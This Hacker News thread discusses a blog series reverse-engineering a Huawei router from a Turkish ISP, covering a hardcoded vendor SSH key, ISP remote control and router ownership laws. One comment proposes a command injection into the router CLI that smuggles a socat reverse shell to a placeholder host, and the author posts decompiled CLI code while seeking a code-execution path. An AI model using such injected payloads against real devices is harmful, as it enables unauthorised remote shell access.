[HN Gopher] A detailed look at the router provided by my ISP
       A detailed look at the router provided by my ISP
       Author : paddlesteamer
       Score  : 487 points
       Date   : 2020-03-25 10:55 UTC (1 days ago)
 (HTM) web link (0x90.psaux.io)
 (TXT) w3m dump (0x90.psaux.io)
       | wyclif wrote:
       | I'm overseas now, and using one of these crappy ISP-provided
       | routers. I miss my nice Linksys router back home with high-
       | density mesh, tri-band WiFi, and four gigabit ethernet ports.
       | 1_player wrote:
       | Very interesting article.
       | What about that precompiled .ssh/authorized_keys with user
       | z00163152@HUAWEI-627FB9A3 mentioned in Part 3?
       | Any reason why a router firmware would permit root access to
       | anyone at all? Definitely sounds like a backdoor to me.
         | skoskie wrote:
         | That was the worst part. I would have that bombshell as the
         | lede. And then delete it if possible.
       | tibbydudeza wrote:
       | Wow some good detective skills at work here , got a similar
       | Huawei HG635 from my provider ... kept it because it supports LTE
       | cutover.
       | Fortunately some kind person leaked the admin password so that I
       | could configure it to my liking.
       | j_h wrote:
       | EU net neutrality regulation grants end users right to use their
       | own equipment.
       | https://fsfe.org/activities/routers/
         | Someone1234 wrote:
         | Turkey isn't in the EU.
           | anticensor wrote:
           | IANAL, but Turkcell would lose the case in Turkey too. This
           | is not due to net neutrality regulations (Turkey deliberately
           | lacks it), but due to case law arisen from competition and
           | customer rights regulations. However, telcos work around that
           | too, by "leasing" modems, like telephone divisions did in the
           | past. Does the trick of "leasing" work in the EU too?
             | mercora wrote:
             | in marketing they try hard to make it sound like what you
             | are going to get by renting their device is WiFi not just
             | the ability to turn on WiFi functionality of the CPE. of
             | course everybody wants that but most people don't get
             | that's not something that has to be provided by the ISP. I
             | am not sure if its required, but i have seen often a lower
             | end device (without WiFi accessible) is given for the
             | lifetime of the contract free of charge.
             | in Germany you have the right to use a compatible device
             | you own yourself. However my ISP Vodafone does not accept
             | lots of modems as compatible and when this regulation
             | started there were basically none you could actually buy.
             | Its not much better now i guess but i distress.
             | EDIT: reading your comment again the trick you mentioned
             | probably works because its "yours" when you lease it
             | instead of renting it?
               | anticensor wrote:
               | Not instead of renting, but of selling.
         | mercora wrote:
         | note there is only Germany, Italy and the Netherlands with this
         | regulation enforced. they even link to a [0]page with progress
         | of that campaign.
         | [0]
         | https://wiki.fsfe.org/Activities/CompulsoryRouters/#Router_F...
       | non-entity wrote:
       | A while back, I was playing around with the cable modem / router
       | the ISP gave me because I was curious and an idiot. After
       | screwing around a bit, I managed to find a vulnerability that
       | exposed technician credentials plaintext and they actually
       | worked. Had no idea where to report it though, because the
       | manufacturers contact page could be summed up as _fuck you we don
       | 't talk directly to consumers_. I dont think the vulnerability
       | was that bad, as you had to be logged in to the web interface
       | already with another account, but still.
       | I don't really trust ISP provided hardware / software now though.
         | Bartweiss wrote:
         | > _you had to be logged in to the web interface already with
         | another account_
         | Obviously I don't know specifics, but if this applies to any
         | router which has multiple tiers of login then it could be a
         | pretty serious problem. I suspect that might be true for
         | routers designed specifically broadcast multiple networks (e.g.
         | school or shared apartment-building routers)?
         | praptak wrote:
         | The right thing to do in such circumstances is to publish the
         | vulnerability.
           | ProZsolt wrote:
           | But how do you publish it without the liability of getting
           | sued? A person like me who don't work in security still
           | occasionally find some vulnerability. Sometimes you get angry
           | emails from the company even if you just try to warn them.
             | jeroenhd wrote:
             | If you think they'd sue, you can always send the details to
             | a tech journalist specialized in such matters (someone with
             | a proven track record of protecting their sources). Use an
             | anonymous email service to be sure.
             | If something goes wrong, they'll take the thread of legal
             | action and probably win. Companies know that suing
             | journalists often leads to more bad press than cooperating.
             | They can even try to contact the company in question for
             | you if the vulnerability is bad enough.
             | If the company doesn't respond or get their shit together,
             | journalists will get a scoop and the company is forced to
             | fix their shit. If the company does fix their shit, the
             | journalist will still get a story out of it and you can
             | rest easy that you've helped make the internet just a
             | little bit safer for everyone.
             | saagarjha wrote:
             | Publish the angry emails too.
             | praptak wrote:
             | Getting sued for what? Also, you can publish anonymously.
             | Sitting on exploits forever only helps attackers and gives
             | false sense of security to dumb companies.
         | steerablesafe wrote:
         | You never know. The same technician credentials could
         | potentially work on many routers from the same ISP, maybe even
         | through WAN.
       | mercora wrote:
       | it looks like this CLI has some hardcoded shell commands with
       | variable substitutions that look possibly unprotected against
       | command injection.
       | For example                 iptables %s > %s 2>&1
       | could probably be executed as                 iptables -L; socat
       | tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane >
       | /var/IptablesInfo 2>&1
       | by issuing                 iptables -L; socat tcp-
       | connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
       | and therefore it might be possible to get real shell access too.
         | paddlesteamer wrote:
         | Hello, OP here, I've actually spent considerable amount time to
         | find a code execution. I know you'll want to learn details of
         | FUN_004122c0 but here is the decompiled version of iptables
         | part from ghidra:
         | undefined4 FUN_004045a0(int param_1,int _param_2)
         | { int iVar1; int iVar2; char _pcVar3; char cVar4; code _pcVar5;
         | undefined auStack544 [256]; undefined auStack288 [260];
         | FUN_00412530(auStack544,0,0x100);
         | FUN_00412530(auStack288,0,0x100);       if (param_1 == 0) {
         | FUN_004122c0(auStack288,0x100,"iptables > %s
         | 2>&1","/var/IptablesInfo");       }       else {         iVar1
         | = FUN_00412210(0x100);         if (iVar1 == 0) {
         | return 0x40010009;         }         cVar4 = '\0';
         | while ((iVar2 = *param_2, iVar2 != 0 && (cVar4 != '\x10'))) {
         | if (cVar4 == '\0') {
         | FUN_004122c0(iVar1,0x100,0x412c84,iVar2);           }
         | else {             FUN_004122c0(iVar1,0x100,"%s
         | %s",iVar1,iVar2);           }           cVar4 = cVar4 + '\x01';
         | param_2 = param_2 + 1;         }
         | FUN_004122c0(auStack288,0x100,"iptables %s > %s
         | 2>&1",iVar1,"/var/IptablesInfo");         FUN_00412660(iVar1);
         | }       FUN_00412330(auStack288);       iVar1 =
         | FUN_004123c0("/var/IptablesInfo",0x414f68);       if (iVar1 ==
         | 0) {         pcVar5 = FUN_004126e0;         pcVar3 = "Fail\r";
         | }       else {         while (iVar2 =
         | FUN_00412470(auStack544,0x100,iVar1), iVar2 != 0) {
         | FUN_004126b0(0x412c84,auStack544);           FUN_004121a0(0xd);
         | }         FUN_00412520(DAT_0042b010);
         | FUN_004123a0(iVar1);         pcVar5 = FUN_00412500;
         | pcVar3 = "/var/IptablesInfo";       }       (*pcVar5)(pcVar3);
         | return 0;
         | }
         | Any ideas?
           | mercora wrote:
           | i guess you already tried issuing commands like i mentioned?!
           | i am still confused by this code but to me it looks like this
           | has been originally written in another language but maybe
           | this is just what it looks like after de-compiling.
           | FUN_004122c0(auStack288,0x100,"iptables %s > %s
           | 2>&1",iVar1,"/var/IptablesInfo");
           | for me it looks like FUN_004122c0 is a function of some
           | object in auStack288 (maybe at offset 0x100?) probably
           | passing the remaining arguments to a sprintf like function
           | before executing it... or maybe it is a function to call
           | instance methods in general and this happens to be the
           | 0x100th function or something...
           | not sure i am getting this right ive never tried this before
           | ^^ seeing this function would likely be more interesting
         | Faaak wrote:
         | Depends if they `execve` or run the command inside a shell.
         | I'd bet for (1), but who knows.
           | Hello71 wrote:
           | redirections aren't parsed by exec....
             | Faaak wrote:
             | Indeed, I read the command's template too fast. Well, in
             | this case it's worrysome
               | Aachen wrote:
               | Controlling arguments without shell often still leads to
               | RCE though, because a lot of software has some flag that
               | runs some command
               | https://0x90909090.blogspot.com/2015/07/no-one-expect-
               | comman...
       | blakesterz wrote:
       | Interesting read! There's actually 3 parts to this:
       | Part 2: https://0x90.psaux.io/2020/03/19/Taking-Back-What-Is-
       | Already...
       | And 3: https://0x90.psaux.io/2020/03/22/Taking-Back-What-Is-
       | Already...
       | Summary from the end of Part 3:
       | "So we managed to change passwords for both ssh and telnet, gain
       | access to Root user for the web interface, changed that password
       | too. We changed ACS URL to ours and remove the IP restrictions.
       | To put it simply, we cleaned up our router from our ISP. Good for
       | our privacy."
         | sheep-a wrote:
         | You forgot this bit of the summary, which I think is more
         | interesting!
         | "Still there is an authorized ssh key left in the firmware but
         | for now it's enough that we're keeping the ISP out. Maybe in
         | the future, we can repack the firmware with our configuration
         | and keys and install it on the router. For now, take care!"
           | Craighead wrote:
           | Huawei implies Chinese intelligence services left that there
       | stevespang wrote:
       | If you are in Turkey, Egodan's boys are spying on
       | EVERYONE,especially after the attempted coup. Huawei is happy to
       | provide spying through the router to Ergodan's Boogiemen - - in
       | fact, several of them are probably next room over from you
       | watching your screen now . . .
       | fulafel wrote:
       | Trivia: Strictly speaking a box that does NAT is not a router in
       | the IP protocol sense, it's a kind of proxy. The router
       | requirements RFC explicitly forbids altering most fields (incl
       | the address field) in the IP header.
         | icedchai wrote:
         | ...an RFC that was written in 1995, before NAT was really
         | necessary.
         | My view: If it forwards IP between different networks, it's a
         | router.
           | fulafel wrote:
           | Nat existed in somewhat wide use in 95, PIX had come out
           | recently. It's not necessary today either.
             | icedchai wrote:
             | It existed, but was definitely not in wide use. I worked
             | for several early internet providers during that period
             | (mid to late 90's.) Most folks had public addresses on
             | their desktops. No customer we ever set up wanted NAT. Most
             | didn't even have firewalls, sadly! Some of these were small
             | companies, some of these were large corporations or
             | universities.
             | And I'd argue NAT actually _is_ necessary if you want IPv4
             | for home use. We 'd be out of addresses otherwise.
               | fulafel wrote:
               | ISPs didn't use it in the early days, but it was used in
               | corporate/organizational networks. The PIX was apparently
               | marketed as a security appliance (heh) so that defined
               | the user base to a large extent.
               | You can access the web over v4 with other kind of proxies
               | besides NAT, for example application level HTTP proxies.
               | If you want working v4 for all the protocols, NAT is out
               | by definition anyways.
               | icedchai wrote:
               | Yes, I remember the PIX! Probably late 97 or 98, I set
               | one up for a large corp. They were not using NAT
               | previously, but HTTP and socks proxies.
         | packet_nerd wrote:
         | The box in people's home's colloquially known as a router
         | actually commonly combines a lot of functions into one:
         | * router
         | * firewall
         | * NAT device
         | * modem
         | * switch
         | * access point
         | * DNS resolver
         | * DHCP server
         | And probably others I'm not thinking of :-)
           | fulafel wrote:
           | Adding more functions to a router doesn't make it a non-
           | router. But if it's doing NAT and not routing, then it's a
           | different distinction. But yep it depends on the
           | configuration.
           | qubex wrote:
           | I call them "terminal adapters", because I'm still stuck in
           | the ISDN age.
           | sandov wrote:
           | ONT in the case of fiber. Don't know if it technically counts
           | as a modem.
             | bobbob1921 wrote:
             | Media converter maybe? (Like those $100 or so fiber to
             | ethernet converters, I say this as it's usually a
             | modem/router plugged into the ONT's ethernet port that does
             | isp to cpe authentication, tunneling, etc. so the ONT is
             | just converting fiber (from isps OLT) to ethernet for
             | something more common to plug into)
         | iso1631 wrote:
         | I have a box that runs various routing protocols including OSPF
         | and BGP, but also does nat where it needs to. It's known as a
         | "router"
         | c0nsumer wrote:
         | Very true. Yet at the same time, it does route traffic to the
         | appropriate boxes. And the name 'router', when referring to
         | something someone has at their house, has entered the
         | vernacular to mean "the box at home which lets me share the
         | internet connection across all my computers".
         | Most folks have no idea how it works behind the scenes, which
         | typically is a combination of NAT (IPv4), routing (IPv6), DHCP,
         | DNS, UPnP, and more. So, it's just "the router".
         | zamadatix wrote:
         | The NAT RFCs came after the routing RFC and refer to NAT as a
         | router function not as an orthogonal function, boxes that do
         | NAT are referred to as routers in the RFC. This is reflected in
         | the real world where NAT is implemented as part of the routing
         | chain not as a separate module. Remember NAT isn't a box
         | creating 2 sockets and ferrying data between them it is just
         | the translation of fields on top of normal routing
         | functionality.
           | the8472 wrote:
           | > boxes that do NAT are referred to as routers in the RFC.
           | Newer RFCs use different terms such as CPE (customer premises
           | equipment) and AFTR (address family transition router)
         | gerdesj wrote:
         | RFC 1918 does allow that the internet was changing rather fast
         | back in 1995 and accepts it probably wont be the final word:
         | https://tools.ietf.org/html/rfc1812#section-1.3.1
         | tssva wrote:
         | Trivia: Strictly speaking a box that does NAT is not a kind of
         | proxy. Proxies act as the destination end point of one
         | connection, establish a separate connection to another endpoint
         | and forward data between the two separate connections. A NAT
         | device changes IP header information such as the address field
         | and if also doing PAT the port field but doesn't act as the
         | source or destination for connections.
       | mafuy wrote:
       | Many people here pointed out a problem: Removing access for the
       | ISP and/or device manufacturer means they cannot fix bugs
       | remotely and automatically. This is bad in situations like when
       | the Mirai malware hit.
       | How about this?: "You can use your own device and we provide all
       | required information, but there will be no advanced support and
       | you have to check for bugfixes yourself monthly."
       | ... now that I wrote it, I see the answer: There is no way to
       | enforce this, especially not reliably.
         | marcosdumay wrote:
         | Ok, from the Wikipedia:
         | > Mirai then identifies vulnerable IoT devices using a table of
         | more than 60 common factory default usernames and passwords
         | Taking control of the device is exactly the kind of thing that
         | stops that attack.
       | davedx wrote:
       | Fantastic write up from a hacking point of view. I did wonder
       | about this statement though:
       | "This is very invasive and unacceptable. It may seem necessary to
       | apply security patches published by your ISP but the user should
       | be able to disable it whenever she wants."
       | Legally, at least in countries where I've lived, the ISP still
       | owns the router. This surprised me a bit when I first found out,
       | but then I got used to the idea, but you should treat any ISP or
       | telecom gear in your house as something that's "rented but still
       | owned and controlled by someone else".
         | yjftsjthsd-h wrote:
         | And that is why I have my own router plugged into the ISP
         | router:)
         | blacksmith_tb wrote:
         | True, but I think it's worth comparing it to other utilities in
         | your home - what if your electric company could make all your
         | lightbulbs 20% dimmer without notice? Or if your water heater
         | was remotely administered? ISPs, like mobile telcos, like to
         | claim they must have control over your hardware "for security"
         | but I think the most charitable interpretation is that it's to
         | make their customer service dept. sweat less (more nefarious
         | possibilities exist, of course).
           | CJefferson wrote:
           | The difference is that non-updated routers can cause global
           | problems. At the very least as an ISP I'd want to say you can
           | look after updates yourself, but we will disable your access
           | to the internet (other than to get the update from us)
           | whenever we try to push an update to you and you reject it.
           | ProZsolt wrote:
           | This is why I like separate modems, so there is a clear
           | border between you and the ISP. Sadly currently most of the
           | providers only give you AIOs.
       | Thaxll wrote:
       | You're lucky to have an SSH server active, on mine I had to open
       | the router and dump the firmware manually :/
       | lxe wrote:
       | > After looking into folders, I found some interesting files. I
       | won't go through them here but I want to mention just one of
       | them: [$ cat etc/ssh/authorized_keys]. Maybe an engineer from
       | Huawei (I assume z00163152@HUAWEI-627FB9A3) who owns a specific
       | DSS key, can connect all HG253s routers without needing a
       | password, who knows?
       | Who knows indeed?!
       | AdmiralAsshat wrote:
       | I never thought to nmap my own router until reading this.
       | PORT      STATE SERVICE       53/tcp    open  domain       80/tcp
       | open  http       631/tcp   open  ipp       5000/tcp  open  upnp
       | 7777/tcp  open  cbt       20005/tcp open  btx
       | Now begins the three-hours-and-counting rabbit hole of trying to
       | figure out what the hell is running on ports 7777 and 20005. Or
       | why UPNP is apparently running, despite UPNP being explicitly
       | disabled on the Netgear router's admin page.
         | manifoldgeo wrote:
         | Maybe it's a remote administration port for your ISP. I have a
         | router provided by Froniter, formerly Verizon FiOS, where port
         | 4567 is always open and cannot be closed with a firewall rule
         | from the router's web UI (grayed out). After some googling I
         | found out that it's their maintenance port:
         | https://www.speedguide.net/port.php?port=4567
         | For a while I had my own OpenWRT router in place of the ISP
         | one, but I think they got wise to it and blocked the MAC. I
         | changed it to match the ISP router's MAC address, but it only
         | worked for about 3 minutes before being blocked again.
           | AdmiralAsshat wrote:
           | I bought both my modem and my router, so I'd be a little
           | incredulous if my ISP had somehow forced a port open on it.
           | The 20005 one _may_ be some port that NetGear uses for its
           | USB Printing, I 've found some articles that mention it.
           | It also struck me that I hit it with nmap using the LAN IP,
           | so perhaps these are only open _within_ the network. I
           | probably need to hit the external IP of the router to see
           | what is externally open. ShieldsUP! didn 't show anything
           | unusual.[1]
           | EDIT: Disclosure of a vulnerability regarding port 20005[2],
           | and Netgear confirming that it does affect my router[3], but
           | should have been fixed. I assume the "fix" was fixing the
           | buffer overflow vulnerability, rather than closing the port
           | altogether.
           | [1] https://www.grc.com/x/ne.dll?bh0bkyd2
           | [2] https://www.kb.cert.org/vuls/id/177092/
           | [3] https://kb.netgear.com/28393/NETGEAR-Product-
           | Vulnerability-A...
       | jason0597 wrote:
       | It's funny to think that if you were to report all of your
       | findings to your local newspaper (Turkish newspaper in this
       | case), as to how Turkish ISPs have complete access to your router
       | or how Huawei (China) has an SSH key for your router, people
       | would go absolutely ballistic. But for us it's just another day
       | of expected craziness and we're tired of talking about it
         | kuesji wrote:
         | i don't think too many people care about this. ( yes, i live in
         | turkey )
         | Someone1234 wrote:
         | > how Turkish ISPs have complete access to your router
         | You think it is going to blow people's socks off that a router
         | provided and controlled by an ISP is accessible by that same
         | ISP? Huh?
         | The Huawei SSH key is a little strange, but depressingly common
         | for network equipment, even big names like Cisco[0].
         | [0]
         | https://tools.cisco.com/security/center/content/CiscoSecurit...
           | Eremotherium wrote:
           | >even big names like Cisco
           | Even? By now Cisco having hardcoded credentials and glaring
           | security fuckups is a meme.
           | gumby wrote:
           | > The Huawei SSH key is a little strange, but depressingly
           | common for network equipment, even big names like Cisco...
           | There's an understandable reason for this: the isp's staff
           | aren't necessarily any more competent than the isp's
           | customers (some are, but there are so many ISPs that I
           | suspect they are now a small minority). So just at the isp
           | wants to be able to reset your interface devices remotely, so
           | will Huawei and Cisco support for the ISPs themselves.
           | I am not implying that "understandable" means "justified"
         | p1esk wrote:
         | Yeah, no one cares outside of hackernews.
           | blaser-waffle wrote:
           | Hell, I'd imagine my grandmother or other non-tech family
           | would be glad the telephone company can pop in and fix it
         | Thaxll wrote:
         | If that stuff listen to the interface of your public IP which
         | is most likely not the case, but yes it's still scary.
         | closeparen wrote:
         | CPE is just part of the ISP's infrastructure that happens to be
         | in your house. There is no need to trust it. Just put your own
         | router in front of it.
           | hazeii wrote:
           | Indeed, I've had a linux box between the router and the local
           | network since the days of dial-up (originally it _was_ the
           | dial-up box, which made and shared the  'net connection). The
           | only reason I've ever had to upgrade the hardware has been
           | because the original setup only had 10MBps NICs.
         | TheSpiceIsLife wrote:
         | > if you were to report all of your findings to your local
         | newspaper ... people would go absolutely ballistic.
         | You reckon? I don't think they'd even be interested in hearing
         | about it.
         | Where do you live and who is your local paper that leads you to
         | believe they'd bother writing, let alone publishing, such a
         | story?
         | kspacewalk2 wrote:
         | Turkish newspapers are almost universally subservient to the
         | autocratic government. Any free press that's still somehow
         | around has way more consequential dictatorial abuses of power
         | to report on, if they dare.
         | 0xff00ffee wrote:
         | I'm pretty sure my new CenturyLInk fiber router is similar. I
         | tried to create a PPoE connection from my WRT1900 direclty to
         | century link using the same credentials and I couldn't connect
         | to my internet. However, now I am motivated to create a bridge
         | and find out why.
         | For CenturyLink fiber I have two boxes:
         | Box A: the exterior fiber enters this box, the tech said it was
         | a "translator"; and the port 4 ethernet on it goes to ...
         | Box B: the centurylink wireless router, which performs the PPoE
         | with my credentials which were somehow hardwired because no one
         | ever told me my username/password. I'm guesing TR-069? Then
         | port 4 on this goes to ...
         | Box C: MY WRT1900AC, which then goes to other subnets for my
         | cameras, lab, and office.
         | I figured Box B was redundant, but trying to remove it has been
         | problematic.
           | tenebrisalietum wrote:
           | B probably exists so they can split fiber between multiple
           | end users or support things like phone service over the same
           | link. Did you use the same VPI and VCI? PPPoE also sends an
           | identifier (the "Host-Uniq" tag if I'm understanding it
           | right) that probably has to match what your ISP is expecting
           | or has assigned.
           | Tourus wrote:
           | > PPoE with my credentials which were somehow hardwired
           | because no one ever told me my username/password
           | They make it very hard to use your own "Box B", but I've set
           | this up twice now (most recently last week). Get the username
           | and password from CenturyLink (the tech that installs the
           | service has this, or call them). Then, google search "century
           | link vlan 201 wan tag". The trick is you need a router that
           | has this functionality, most basic consumer ones don't.
           | Unfortunately, even if you follow all directions and it still
           | doesn't work troubleshooting is a nightmare, very little or
           | no help from their customer support.
             | 0xff00ffee wrote:
             | Ah I see. My WRT1900AC doesn't have that option. I was
             | running OpenWRT but ran into some issues and panicked back
             | to the default firmware. Now that I have another wireless
             | router I might dare it again.
           | JackRabbitSlim wrote:
           | I had CL fiber. VLAN tagging; The vlan tagging value was so
           | high, OpenWRT didn't support it so I was left with the
           | useless middle box. Your mileage may very.
             | 0xff00ffee wrote:
             | I was just about to re-install OpenWRT, but I guess I won't
             | now.
       | 0xff00ffee wrote:
       | Why did port 8015 show up on the remote system after resetting
       | firmware? Shouldn't nmap have reported that?
         | usmannk wrote:
         | It was a "fast nmap", so only the top 100 most common ports
         | were checked.
           | 0xff00ffee wrote:
           | Ah, thanks. If nmap was run exhaustively on all 64k ports,
           | would that both (a) take forever, and (b) raise alarm bells
           | on the target? Why isn't a full scan the norm?
       | zeroflow wrote:
       | ...and that's why my ISPs router is running in modem mode with a
       | non-ISP-controlled router from Ubiquiti behind it - which I may
       | replace with a pfSense box in the future.
       | I'm pretty happy that my cable ISP is allowing this mode so I
       | don't have to double-NAT in my setup.
         | matheusmoreira wrote:
         | You're lucky your ISP's router offers you that option. My ISP's
         | VDSL2 router would require "unlocking" in order to get bridge
         | mode and it can't be easily replaced.
         | pwg wrote:
         | This is why, in my case, the ISP's router (that awful box
         | Verizon provides with FIOS) is sitting, beside the DMARC,
         | unplugged and powered off.
         | My DMARC has a hot ethernet jack, and _my_ firewall (PC running
         | Linux) that I control is connected to that ethernet jack. No
         | ISP shenanigans (other than what they can remotely do to
         | configure the FIOS DMARC itself).
         | awelkie wrote:
         | If your ISP didn't have that feature, could you just replace
         | the cable modem too? My ISP's router is running EuroDOCSIS 3.0
         | and I'm wondering if I could replace the router with a modem +
         | router of my own.
           | zeroflow wrote:
           | Sadly I could not, since the ISP is defining the router as
           | the endpoint of it's network so there is no freedom to choose
           | different models.
             | em-bee wrote:
             | practically though what is the difference between having
             | the endpoint in a shaft by the elevator or in your
             | apartment or even down the street? in all scenarios i'd put
             | my own router behind the ISP equipment and run my local
             | network however i want.
             | the only issue is with getting a public ip address for
             | inbound connections.
             | here we are not getting public ip addresses anyways, so the
             | point is moot for me. but if you do get one, then all they
             | need to do is configure their router to forward the public
             | ip to yours.
             | in my case the ISP even installed two routers. one was
             | theirs that i had no access to and one was "ours" that i
             | was able to configure as i liked or replace with my own.
             | both routers had their own wifi, but i don't use the one
             | from the ISP endpoint router
           | mercora wrote:
           | if you happened to live in Germany there is a law in place
           | that force ISPs to allow that. But if you would live in
           | Germany you would probably know about this. That said there
           | is no technical reason making it impossible. If you connect
           | an unknown device here, you get access to the customer web
           | panel only and can register your device using it. Afterwards
           | it gets provisioned as usual (with caveats [no PacketCable
           | for example])
           | pmlnr wrote:
           | Yes, you could, but the new router+modem needs to be
           | "accepted" by the DOCSIS provisioning. Talk to the support
           | about it.
         | skoskie wrote:
         | I have been so disappointed with my ubiquiti hardware. That UI
         | is gorgeous, but lacks some real functionality that I need. I
         | can't block BitTorrent (see forums). And I can't see a detailed
         | traffic log; only the categories. Plus, those pretty graphs
         | that tell you how much data you've used doesn't give a time
         | frame. I have no idea if it's a week or a month.
         | I think pfSense will be my next too.
         | bonestamp2 wrote:
         | I recently upgraded my internet speed and my pfSense box was
         | limiting my top download speed. So, I just went from pfSense to
         | a Ubiquiti Secure Gateway. There are pros and cons of each, but
         | I couldn't find any trustworthy pfSense hardware with the
         | performance of a USG for anywhere near the same price. I do
         | miss the configurability of pfSense though so I might switch
         | back some day. That said, the ubiquiti interface and
         | provisioning model is really slick.
         | chrisweekly wrote:
         | I'd be grateful for guidance eg a link to a writeup of
         | recommended hardware and config for a reasonably technical
         | audience, eg "Given a Verizon FIOS G1100, put it in bridge mode
         | and connect hw that supports software X"...
           | mercora wrote:
           | most of the time you only require PPPoE or DHCP as you
           | practically speaking get a ethernet tunnel to your ISP using
           | that bridge. Some ISPs additionally segment this network by
           | VLANs so your list of required features is probably already
           | complete here.
       | hestefisk wrote:
       | My ISP (Internode) provide a 'modem' for my NBN hybrid coax /
       | fibre connection. I just put my OPNSense router in front of it
       | and it's all secure. They provided me with all the config
       | settings, which are a bit more obscure than usual (PPPoE but on a
       | specific vlan tag). Works like a charm and I don't have to worry
       | about weird government wiretapping or backdoors. My ISP provide
       | an IPv6 range too, which is pretty cool.
       | miki123211 wrote:
       | Apparently a polish carrier called Multimedia has recently
       | introduced a new, revolutionary service for some customers. It's
       | called "set up a custom wi-fi configuration", and it's just 5 pln
       | (a little over $1)! It lets you think up of a ssid and password,
       | and configure your router to use those! That's an amazing
       | invention, isn't it? /s
       | Some customers apparently have absolutely no access to their
       | routers, not even to the web interface, and they can't use their
       | own either. All reconfiguration must be done through the customer
       | service portal or by phone. That means the carrier can change for
       | every little thing, including changing the Wi-Fi config! I'm not
       | sure if you can even bridge, but I guess not. Note that this does
       | not affect all customers of that carrier, just a minority.
         | gbrown wrote:
         | Couldn't you just daisy chain a second router via Ethernet and
         | use it? Bonus points for VPN-ing all of your traffic.
           | the8472 wrote:
           | Daisy-chaining routers is can severely degrade some services
           | (gaming, p2p) due to NAT. Assuming the ISP-provided one
           | supports PCP or UPnP-IGD you need a client on your own router
           | that relays port forwarding configuration to the upstream
           | router. This is possible but may need non-trival setup.
             | pathseeker wrote:
             | PCP that allows ingress connections without an established
             | egress connection is rarely enabled. The same applies to
             | UPnP because of the baddies.
             | https://en.wikipedia.org/wiki/Port_Control_Protocol#Securit
             | y
       | ege_erdogan wrote:
       | I am using the exact same router from the same ISP. I was
       | wondering what the problem was when I wasn't able to forward port
       | 22 to my computer for an SSH connection.
       | I had thought it had something to with the ISP allocating the
       | same static IP to multiple clients and blocking some common ports
       | to prevent collisions (ended up using port 109.. something for
       | SSH). Turns out it was more interesting!
       | gumby wrote:
       | I clicked through to the two follow ups -- this is both excellent
       | sleuthery and a wonderful write up.
       | sloshnmosh wrote:
       | I very much enjoyed this! I bookmarked your site and hope to read
       | more of your posts in the future.
       | jscholes wrote:
       | Enjoyed this write-up, but most of the exploration seemed to be
       | facilitated by someone having already leaked the CLI root
       | password online. Anyone have suggestions on how you might
       | otherwise obtain that information?
         | paddlesteamer wrote:
         | Hi, OP here, actually it's not true. Think the scenario as
         | this: you don't have the CLI root password, you just do a MitM
         | attack and learn about root password when your ISP attempts to
         | change it. This applies my situation, also I could learn about
         | the default password just by looking into the firmware.
       | LeonM wrote:
       | In the Netherlands we now have a law where ISPs must allow your
       | own choice of network equipment. This means they must give you
       | the required information on how to connect your own device with
       | their network.
       | I have a fiber connection, which I connected directly to a
       | Ubiquity router through a suitable SFP module. My ISP supplied
       | the information on the fiber type and which VLAN ID's to setup
       | for internet, TV and telephony.
       | This way I have my own equipment, that I control myself. The
       | 'modem' [0] which my ISP supplied is still in its original,
       | unopened box.
         | lima wrote:
         | Same in Germany! ISPs hate it because it it makes their lives a
         | lot harder - in cable networks, they now have to deal with a
         | zoo of endpoints on a shared medium vs. a small set of
         | standardized devices.
         | As a customer, I like it.
           | metters wrote:
           | They also hate it, because they cannot charge rent, like for
           | the ISP owned router.
           | pas wrote:
           | Can't they still just provide you with a "modem" and give you
           | full IP access through that? What difference does it make if
           | they put the modem inside our outside your premises? (Eg they
           | put a switch/DSLAM/modem into a box on the street and then
           | they give you a cable?)
           | pdonis wrote:
           | _> ISPs hate it because it it makes their lives a lot harder
           | - in cable networks, they now have to deal with a zoo of
           | endpoints on a shared medium vs. a small set of standardized
           | devices._
           | In other words, ISPs hate it because it forces them to
           | actually do their jobs and be ISPs. The Internet itself is "a
           | zoo of endpoints on a shared medium", and ISP stands for
           | _Internet_ Service Provider.
             | josephmosby wrote:
             | It's not the provision of Internet that's the problem, it's
             | the customer service requests.
             | e.g., AT&T could provide perfect service to the home
             | endpoint, but the customer bought some aftermarket router
             | from their cousin, who had configured it for Verizon.
             | Customer calls AT&T to holler. Tier 1 support doesn't know
             | what that particular router config GUI even looks like, so
             | it gets bumped to T2 or T3. Ultimately to find out that the
             | customer's cousin had hardcoded DNS to some internal
             | Verizon system that's not visible to AT&T.
             | Repeat x100K. ISPs job isn't just "provide the Internet,"
             | it's also "provide all the troubleshooting for every non-
             | technical customer who just wants to watch Netflix but
             | doesn't even know what a router is"
               | ClumsyPilot wrote:
               | Well, my understanding is that once you have your own
               | router, it's up to you to ensure its configured
               | correctly.
               | pdonis wrote:
               | Exactly. I have my own router (and cable modem, for that
               | matter), and I don't call Comcast when one of them
               | breaks; I fix it myself, since I own them.
               | kitteh wrote:
               | Problem is you'll eventually reach a point where the
               | problem is deep and requires them to escalate, and if you
               | aren't checking the box of tested customer cpe they'll
               | stop. Example of this is when I found a Comcast backbone
               | link with an incorrect/inconsistent MTU setting. Had to
               | go back channel in the end to someone on the ibone team,
               | but I had no chance in hell of getting that fixed
               | promptly via regular support.
               | pdonis wrote:
               | _> you 'll eventually reach a point where the problem is
               | deep and requires them to escalate, and if you aren't
               | checking the box of tested customer cpe they'll stop_
               | I've been a Comcast customer for more than 20 years (in
               | two different states) and have never encountered a
               | problem like this, so I expect such problems are
               | extremely rare. Every issue I've had has been of the kind
               | where Comcast's support person can see right away that
               | there's a problem on their end because they can't even
               | see my cable modem's status even though I confirm to them
               | that it's powered up and the cable is connected (and of
               | course I have to go through the dance of rebooting it
               | multiple times before they'll be satisfied). Most of the
               | time they put me on hold for a while and then come back
               | and the problem is fixed (I assume because some tech in
               | the background rebooted or reset something that was
               | borked). Once they had to send a tech to my house and it
               | turned out there was a bad connection in the junction box
               | they had installed outside.
               | matheusmoreira wrote:
               | > provide all the troubleshooting for every non-technical
               | customer who just wants to watch Netflix but doesn't even
               | know what a router is
               | People who don't even know what a router is don't buy
               | their own equipment. Those who buy better routers don't
               | require support for them, they call when there's a
               | problem between the ISP and the router.
               | pdonis wrote:
               | _> ISPs job isn 't just "provide the Internet," it's also
               | "provide all the troubleshooting for every non-technical
               | customer who just wants to watch Netflix but doesn't even
               | know what a router is"_
               | No ISP that I'm aware of will provide troubleshooting for
               | devices they don't own. They just say "sorry, not our
               | device, not our problem". When I installed my own cable
               | modem and router, Comcast was quite clear about that. And
               | I said "fine, no problem".
               | jmiserez wrote:
               | My ISP does, but they're the exception to the rule and
